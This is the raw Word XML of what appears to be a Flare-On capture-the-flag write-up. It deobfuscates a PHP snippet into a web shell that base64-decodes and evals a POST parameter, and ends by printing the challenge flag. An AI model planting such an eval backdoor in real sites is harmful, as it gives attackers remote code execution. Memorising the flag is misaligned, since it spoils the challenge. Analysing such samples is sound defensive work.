    <w:p w14:paraId="707591D1" w14:textId="737A37B2" w:rsidR="00BC7CD0" w:rsidRDefault="00BC7CD0" w:rsidP="00C068BB"/>
    <w:p w14:paraId="32B79E6D" w14:textId="003E8696" w:rsidR="006E2598" w:rsidRDefault="002B2018" w:rsidP="002B2018">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc39405842"/>
      <w:r>
        <w:t xml:space="preserve">Deobfuscating </w:t>
      </w:r>
      <w:r w:rsidR="00136F0D">
        <w:t>the php code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="07BC236F" w14:textId="36362F10" w:rsidR="00A30A57" w:rsidRDefault="002B2018" w:rsidP="00C068BB">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00733144">
        <w:t xml:space="preserve">. There are variable names with </w:t>
      </w:r>
      <w:r w:rsidR="00733144" w:rsidRPr="00730353">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r w:rsidR="00733144">
        <w:t xml:space="preserve"> data, after </w:t>
      </w:r>
      <w:r w:rsidR="00AB3B1E">
        <w:t>deobfuscating</w:t>
      </w:r>
      <w:r w:rsidR="008E4463">
        <w:t xml:space="preserve"> the above php code</w:t>
      </w:r>
      <w:r w:rsidR="00AB3B1E">
        <w:t xml:space="preserve"> and renaming its </w:t>
      </w:r>
      <w:r w:rsidR="00752D49">
        <w:t>variables,</w:t>
      </w:r>
      <w:r w:rsidR="008E4463">
        <w:t xml:space="preserve"> we get the following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3139" w:rsidRPr="006A1D4B" w14:paraId="4E5851EE" w14:textId="77777777" w:rsidTr="001D3139">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3079168D" w14:textId="77777777" w:rsidR="00AA2A45" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A45">
            <w:r>
              <w:t>$_ = if(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>($_POST["\97\49\49\68\x4F\84\116\x68\97</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3062F9F6" w14:textId="77777777" w:rsidR="00AA2A45" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A4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\x74\x44\x4F\x54\x6A\97\x76\x61</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="601C2AEE" w14:textId="77777777" w:rsidR="00AA2A45" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A4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\x35\x63\x72\97\x70\x41\84\x66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33A7E120" w14:textId="77777777" w:rsidR="00AA2A45" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A4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\x6C\97\x72\x65\x44\65\x53\72</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A745B58" w14:textId="77777777" w:rsidR="00AA2A45" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A4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\111\110\68\79\84\99\x6F\x6D"]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CE12D30" w14:textId="77777777" w:rsidR="00AA2A45" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A45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)) { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="158F6BB3" w14:textId="77777777" w:rsidR="00AA2A45" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A4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eval(base64_decode($_POST["\97\49\x31\68\x4F</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A235CD0" w14:textId="77777777" w:rsidR="00AA2A45" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A4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\x54\116\104\x61\116</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA5278B" w14:textId="77777777" w:rsidR="001A0D0D" w:rsidRPr="001A0D0D" w:rsidRDefault="001A0D0D" w:rsidP="00AA2A45">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A0D0D">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="001A0D0D">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>\x44\79\x54\106\97\118</w:t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  <w:t xml:space="preserve"> </w:t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  <w:t>\97\53\x63\114\x61</w:t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  <w:t xml:space="preserve"> </w:t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  <w:t>\x70\65\84\102\x6C</w:t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  <w:t xml:space="preserve"> </w:t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Pr="001A0D0D">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61AB0021" w14:textId="14F7ECD0" w:rsidR="00AA2A45" w:rsidRPr="00AA2A45" w:rsidRDefault="001A0D0D" w:rsidP="00AA2A45">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A0D0D">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="001A0D0D">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>\x61\114\101\x44\65</w:t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  <w:t xml:space="preserve"> </w:t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1A0D0D">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>\x53\72\111\x6E\x44</w:t>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA2A45" w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">\x4F\84\99\x6F\x6D"])); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7830CC46" w14:textId="77777777" w:rsidR="00AA2A45" w:rsidRPr="00AA2A45" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A45">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="031994EA" w14:textId="77777777" w:rsidR="00AA2A45" w:rsidRPr="00AA2A45" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A45">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>$__ = $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> = base64_decode($_); </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>eval</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>($</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA2A45">
              <w:rPr>
                <w:lang w:val="es-419"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077295AD" w14:textId="77777777" w:rsidR="00AA2A45" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A45">
            <w:r>
              <w:t>$___= "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="322EF421" w14:textId="51E4B7F5" w:rsidR="001D3139" w:rsidRPr="00551C12" w:rsidRDefault="00AA2A45" w:rsidP="00AA2A45">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00551C12">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>eval($___($__));</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B898E52" w14:textId="1DD48ACB" w:rsidR="001D3139" w:rsidRDefault="001D3139" w:rsidP="00C068BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761C6406" w14:textId="3C252FED" w:rsidR="00BC4D31" w:rsidRPr="00551C12" w:rsidRDefault="00551C12" w:rsidP="00BC4D31">
      <w:r w:rsidRPr="00551C12">
        <w:t>2. We noticed that t</w:t>
      </w:r>
      <w:r>
        <w:t>he last instruction called eval, will execute the complete php code</w:t>
      </w:r>
      <w:r w:rsidR="00BC4D31">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BC4D31">
        <w:t>Some of the php variables contains characters in hexadecimal</w:t>
      </w:r>
      <w:r w:rsidR="001F61DD">
        <w:t>, octal</w:t>
      </w:r>
      <w:r w:rsidR="00BC4D31">
        <w:t xml:space="preserve"> and decimal codification, if we translate them to ascii, we get the following </w:t>
      </w:r>
      <w:r w:rsidR="001C4EA3"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7A99" w14:paraId="2697C63D" w14:textId="77777777" w:rsidTr="00A97A99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52F5831A" w14:textId="77777777" w:rsidR="00E017EE" w:rsidRDefault="00E017EE" w:rsidP="00E017EE">
            <w:r>
              <w:t>if(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">($_POST["a11DOTthatDOTjava5crapATflareDASHonDOTcom"])) { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FB35370" w14:textId="77777777" w:rsidR="00E017EE" w:rsidRDefault="00E017EE" w:rsidP="00E017EE">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">eval(base64_decode($_POST["a11DOTthatDOTjava5crapATflareDASHonDOTcom"])); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24F0025F" w14:textId="0D94C51C" w:rsidR="00A97A99" w:rsidRDefault="00E017EE" w:rsidP="00E017EE">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BB2DF77" w14:textId="7E50D318" w:rsidR="00331B46" w:rsidRDefault="00331B46" w:rsidP="00C068BB"/>
    <w:p w14:paraId="718A8B12" w14:textId="4B6C75C6" w:rsidR="004E39C3" w:rsidRPr="00973581" w:rsidRDefault="005F1359" w:rsidP="00973581">
      <w:r>
        <w:t>And finally, the flag is revelated</w:t>
      </w:r>
      <w:r w:rsidR="00973581">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB3368A" w14:textId="52B9B082" w:rsidR="0088255E" w:rsidRDefault="003C1883" w:rsidP="0088255E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc39405843"/>
      <w:r>
        <w:t>Flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="38B5522E" w14:textId="77777777" w:rsidR="00100193" w:rsidRPr="00100193" w:rsidRDefault="00100193" w:rsidP="001001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193" w14:paraId="51C776BD" w14:textId="77777777" w:rsidTr="00100193">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61493D74" w14:textId="20A901B4" w:rsidR="00100193" w:rsidRPr="00100193" w:rsidRDefault="00D37D6A" w:rsidP="003C1883">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D37D6A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>a11.that.java5crap@flare-on.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="308DE388" w14:textId="77777777" w:rsidR="006D6BE1" w:rsidRPr="00751C94" w:rsidRDefault="006D6BE1" w:rsidP="00751C94"/>
    <w:sectPr w:rsidR="006D6BE1" w:rsidRPr="00751C94" w:rsidSect="00260E87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C8C171" w14:textId="77777777" w:rsidR="00A579E0" w:rsidRDefault="00A579E0" w:rsidP="00902EC3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1717931F" w14:textId="77777777" w:rsidR="00A579E0" w:rsidRDefault="00A579E0" w:rsidP="00902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98559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AE92F8" w14:textId="7019D288" w:rsidR="00FC1D53" w:rsidRDefault="00FC1D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AF88FD" w14:textId="77777777" w:rsidR="00FC1D53" w:rsidRDefault="00FC1D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17198D" w14:textId="77777777" w:rsidR="00A579E0" w:rsidRDefault="00A579E0" w:rsidP="00902EC3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4037E558" w14:textId="77777777" w:rsidR="00A579E0" w:rsidRDefault="00A579E0" w:rsidP="00902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1CCC0" w14:textId="5B5EFC59" w:rsidR="00902EC3" w:rsidRDefault="00902EC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03D39F" wp14:editId="47114DE3">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-914400</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-447675</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7800975" cy="847725"/>
          <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
          <wp:wrapSquare wrapText="bothSides"/>
          <wp:docPr id="58" name="Pictur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75" cy="847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110FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4BA2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C34E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3E22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91050"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD242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35EA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53B4B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E4936"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0C06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4732A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC207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C761B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53D6B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3CA597C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5004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B5E91"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="424A8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412ABA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAACD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B16E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="384AE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9602D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C47C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93AF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D90B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5E0EED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D965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784227"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1382A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743E20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D965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A3CC2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3AF2D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5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="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0A"/>
    <w:rsid w:val="00000E72"/>
    <w:rsid w:val="00011995"/>
    <w:rsid w:val="0001237C"/>
    <w:rsid w:val="00013E47"/>
    <w:rsid w:val="00017D97"/>
    <w:rsid w:val="0002027F"/>
    <w:rsid w:val="00024446"/>
    <w:rsid w:val="0002456A"/>
    <w:rsid w:val="000262BE"/>
    <w:rsid w:val="00026EF1"/>
    <w:rsid w:val="00030D55"/>
    <w:rsid w:val="000310AC"/>
    <w:rsid w:val="000340E9"/>
    <w:rsid w:val="00034C69"/>
    <w:rsid w:val="00035E91"/>
    <w:rsid w:val="00036826"/>
    <w:rsid w:val="000375C9"/>
    <w:rsid w:val="00037FF5"/>
    <w:rsid w:val="00040A47"/>
    <w:rsid w:val="0004248D"/>
    <w:rsid w:val="00042AEC"/>
    <w:rsid w:val="00043245"/>
    <w:rsid w:val="0005275A"/>
    <w:rsid w:val="00053A65"/>
    <w:rsid w:val="00055BEC"/>
    <w:rsid w:val="00055F5B"/>
    <w:rsid w:val="00062400"/>
    <w:rsid w:val="000658DE"/>
    <w:rsid w:val="0007301D"/>
    <w:rsid w:val="00073B33"/>
    <w:rsid w:val="00074542"/>
    <w:rsid w:val="00076DF0"/>
    <w:rsid w:val="00077C51"/>
    <w:rsid w:val="000823DC"/>
    <w:rsid w:val="00083A36"/>
    <w:rsid w:val="00084EA9"/>
    <w:rsid w:val="00087E04"/>
    <w:rsid w:val="00090288"/>
    <w:rsid w:val="00091BE7"/>
    <w:rsid w:val="00097C7A"/>
    <w:rsid w:val="000A2494"/>
    <w:rsid w:val="000A256B"/>
    <w:rsid w:val="000A2CE6"/>
    <w:rsid w:val="000A3807"/>
    <w:rsid w:val="000A41E0"/>
    <w:rsid w:val="000A5888"/>
    <w:rsid w:val="000B05C4"/>
    <w:rsid w:val="000B27D8"/>
    <w:rsid w:val="000B6167"/>
    <w:rsid w:val="000B658D"/>
    <w:rsid w:val="000B67EC"/>
    <w:rsid w:val="000B72F6"/>
    <w:rsid w:val="000B7445"/>
    <w:rsid w:val="000C4A70"/>
    <w:rsid w:val="000C57A4"/>
    <w:rsid w:val="000C6F9C"/>
    <w:rsid w:val="000D004D"/>
    <w:rsid w:val="000D0866"/>
    <w:rsid w:val="000D0A88"/>
    <w:rsid w:val="000D569B"/>
    <w:rsid w:val="000D6EB6"/>
    <w:rsid w:val="000E3538"/>
    <w:rsid w:val="000E38AB"/>
    <w:rsid w:val="000E6F0A"/>
    <w:rsid w:val="000E7507"/>
    <w:rsid w:val="000F4184"/>
    <w:rsid w:val="000F6B4D"/>
    <w:rsid w:val="000F761C"/>
    <w:rsid w:val="000F78B2"/>
    <w:rsid w:val="00100193"/>
    <w:rsid w:val="00100BEC"/>
    <w:rsid w:val="0010465B"/>
    <w:rsid w:val="00107BA8"/>
    <w:rsid w:val="00107EA8"/>
    <w:rsid w:val="00112D9E"/>
    <w:rsid w:val="00114F42"/>
    <w:rsid w:val="00115CEF"/>
    <w:rsid w:val="001171C0"/>
    <w:rsid w:val="00122014"/>
    <w:rsid w:val="00123312"/>
    <w:rsid w:val="0012442B"/>
    <w:rsid w:val="00127587"/>
    <w:rsid w:val="001301F4"/>
    <w:rsid w:val="001342AB"/>
    <w:rsid w:val="00136F0D"/>
    <w:rsid w:val="001404EA"/>
    <w:rsid w:val="001443AC"/>
    <w:rsid w:val="0015001C"/>
    <w:rsid w:val="0015019A"/>
    <w:rsid w:val="001522C8"/>
    <w:rsid w:val="0015262D"/>
    <w:rsid w:val="001554F7"/>
    <w:rsid w:val="0015697E"/>
    <w:rsid w:val="001643A4"/>
    <w:rsid w:val="001654A7"/>
    <w:rsid w:val="00165F4F"/>
    <w:rsid w:val="00166CD0"/>
    <w:rsid w:val="0016764F"/>
    <w:rsid w:val="0017155E"/>
    <w:rsid w:val="001717B8"/>
    <w:rsid w:val="00171A11"/>
    <w:rsid w:val="001733F0"/>
    <w:rsid w:val="00176A8D"/>
    <w:rsid w:val="0017744A"/>
    <w:rsid w:val="00182B42"/>
    <w:rsid w:val="0018341A"/>
    <w:rsid w:val="0018346C"/>
    <w:rsid w:val="00184D69"/>
    <w:rsid w:val="00186512"/>
    <w:rsid w:val="001878A2"/>
    <w:rsid w:val="00187ADD"/>
    <w:rsid w:val="00187BE4"/>
    <w:rsid w:val="00191369"/>
    <w:rsid w:val="00194019"/>
    <w:rsid w:val="0019618C"/>
    <w:rsid w:val="001A0D0D"/>
    <w:rsid w:val="001A102A"/>
    <w:rsid w:val="001A3E76"/>
    <w:rsid w:val="001B675B"/>
    <w:rsid w:val="001B6DED"/>
    <w:rsid w:val="001B7708"/>
    <w:rsid w:val="001C02C3"/>
    <w:rsid w:val="001C2570"/>
    <w:rsid w:val="001C4320"/>
    <w:rsid w:val="001C4EA3"/>
    <w:rsid w:val="001D256E"/>
    <w:rsid w:val="001D3139"/>
    <w:rsid w:val="001D477C"/>
    <w:rsid w:val="001D6033"/>
    <w:rsid w:val="001D6867"/>
    <w:rsid w:val="001D6C89"/>
    <w:rsid w:val="001D6D81"/>
    <w:rsid w:val="001E449A"/>
    <w:rsid w:val="001E4A81"/>
    <w:rsid w:val="001E4B45"/>
    <w:rsid w:val="001E5317"/>
    <w:rsid w:val="001F2392"/>
    <w:rsid w:val="001F51D0"/>
    <w:rsid w:val="001F61DD"/>
    <w:rsid w:val="00200015"/>
    <w:rsid w:val="00200284"/>
    <w:rsid w:val="00205C6C"/>
    <w:rsid w:val="0020640B"/>
    <w:rsid w:val="002217F2"/>
    <w:rsid w:val="0022484A"/>
    <w:rsid w:val="00225540"/>
    <w:rsid w:val="00225AED"/>
    <w:rsid w:val="002262B7"/>
    <w:rsid w:val="00226DF4"/>
    <w:rsid w:val="002306D9"/>
    <w:rsid w:val="0023093B"/>
    <w:rsid w:val="002315E6"/>
    <w:rsid w:val="00232D1F"/>
    <w:rsid w:val="00237532"/>
    <w:rsid w:val="00243ECB"/>
    <w:rsid w:val="00244CC8"/>
    <w:rsid w:val="0024512E"/>
    <w:rsid w:val="00250CC5"/>
    <w:rsid w:val="00254C3A"/>
    <w:rsid w:val="002553F4"/>
    <w:rsid w:val="00256A3C"/>
    <w:rsid w:val="0025750D"/>
    <w:rsid w:val="00257680"/>
    <w:rsid w:val="002601E4"/>
    <w:rsid w:val="00260E87"/>
    <w:rsid w:val="00261392"/>
    <w:rsid w:val="002647C1"/>
    <w:rsid w:val="00265BD4"/>
    <w:rsid w:val="002664C8"/>
    <w:rsid w:val="00266678"/>
    <w:rsid w:val="00266B8A"/>
    <w:rsid w:val="00266DCA"/>
    <w:rsid w:val="00271980"/>
    <w:rsid w:val="00272699"/>
    <w:rsid w:val="00274DFF"/>
    <w:rsid w:val="00274F8F"/>
    <w:rsid w:val="0027569D"/>
    <w:rsid w:val="00277896"/>
    <w:rsid w:val="00277D9C"/>
    <w:rsid w:val="00280F98"/>
    <w:rsid w:val="0028110F"/>
    <w:rsid w:val="0028135D"/>
    <w:rsid w:val="00282D8A"/>
    <w:rsid w:val="00287ADB"/>
    <w:rsid w:val="002903B0"/>
    <w:rsid w:val="00294174"/>
    <w:rsid w:val="002973E2"/>
    <w:rsid w:val="00297986"/>
    <w:rsid w:val="002A0024"/>
    <w:rsid w:val="002A08F5"/>
    <w:rsid w:val="002A2847"/>
    <w:rsid w:val="002A3D53"/>
    <w:rsid w:val="002A47E3"/>
    <w:rsid w:val="002A7E14"/>
    <w:rsid w:val="002B0C7F"/>
    <w:rsid w:val="002B2018"/>
    <w:rsid w:val="002B29EB"/>
    <w:rsid w:val="002B3E1C"/>
    <w:rsid w:val="002B6E06"/>
    <w:rsid w:val="002B7142"/>
    <w:rsid w:val="002C02BA"/>
    <w:rsid w:val="002C040D"/>
    <w:rsid w:val="002C10E7"/>
    <w:rsid w:val="002C1228"/>
    <w:rsid w:val="002C3B3A"/>
    <w:rsid w:val="002C3DA0"/>
    <w:rsid w:val="002C4EA7"/>
    <w:rsid w:val="002D191F"/>
    <w:rsid w:val="002D3DD7"/>
    <w:rsid w:val="002E2F39"/>
    <w:rsid w:val="002E30BA"/>
    <w:rsid w:val="002E32B5"/>
    <w:rsid w:val="002E3CC0"/>
    <w:rsid w:val="002E42B2"/>
    <w:rsid w:val="002F04A9"/>
    <w:rsid w:val="002F0CA8"/>
    <w:rsid w:val="002F2DD8"/>
    <w:rsid w:val="002F524D"/>
    <w:rsid w:val="00300A2B"/>
    <w:rsid w:val="00301C47"/>
    <w:rsid w:val="003023A2"/>
    <w:rsid w:val="00314CDF"/>
    <w:rsid w:val="0031661F"/>
    <w:rsid w:val="003245E8"/>
    <w:rsid w:val="003246F6"/>
    <w:rsid w:val="00325E9F"/>
    <w:rsid w:val="003260AE"/>
    <w:rsid w:val="003273DB"/>
    <w:rsid w:val="00331B46"/>
    <w:rsid w:val="00332417"/>
    <w:rsid w:val="00332712"/>
    <w:rsid w:val="00333979"/>
    <w:rsid w:val="003345D1"/>
    <w:rsid w:val="00336679"/>
    <w:rsid w:val="003378C5"/>
    <w:rsid w:val="00342705"/>
    <w:rsid w:val="00343E4F"/>
    <w:rsid w:val="00344DBD"/>
    <w:rsid w:val="003472AC"/>
    <w:rsid w:val="003479B3"/>
    <w:rsid w:val="0035087C"/>
    <w:rsid w:val="00352556"/>
    <w:rsid w:val="00353ED1"/>
    <w:rsid w:val="0035481D"/>
    <w:rsid w:val="003557E8"/>
    <w:rsid w:val="00357637"/>
    <w:rsid w:val="00363F4E"/>
    <w:rsid w:val="00364B9A"/>
    <w:rsid w:val="00366A3C"/>
